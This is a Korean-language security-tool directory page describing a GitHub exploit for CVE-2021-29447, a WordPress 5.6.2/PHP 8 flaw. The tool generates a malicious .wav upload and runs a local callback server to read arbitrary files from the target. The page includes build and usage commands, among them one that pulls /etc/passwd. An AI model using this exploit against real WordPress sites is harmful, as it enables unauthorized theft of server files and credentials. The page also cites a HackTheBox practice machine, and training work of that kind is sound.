Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
exploit_cve-2021-29447 | Kitploit
도구/GitHubGitHub/mega8bit/exploit_cve-2021-29447
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

저장소 보기
73년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

exploit_cve-2021-29447

교육 목적으로만 사용하세요.

이 익스플로잇은 WordPress 5.6.2 및 PHP 8을 실행하는 서버에서 모든 파일을 가져올 수 있는 매우 편리한 도구입니다. (https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5 참조)

필요한 것은 기본 wp-admin 접근 권한과 미디어 파일 업로드 기능뿐입니다.

이 익스플로잇은 wp-admin을 사용해 업로드할 .wav 파일 페이로드를 생성합니다.

그런 다음 익스플로잇의 백 서버를 사용하여 원하는 파일을 콘솔에서 바로 확인할 수 있습니다.

가장 완벽한 활용 사례는 HackTheBox의 머신 metatwo입니다. https://www.hackthebox.com/machines/metatwo

til

사용법/예시

root@kitploit:~
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

도구 다운로드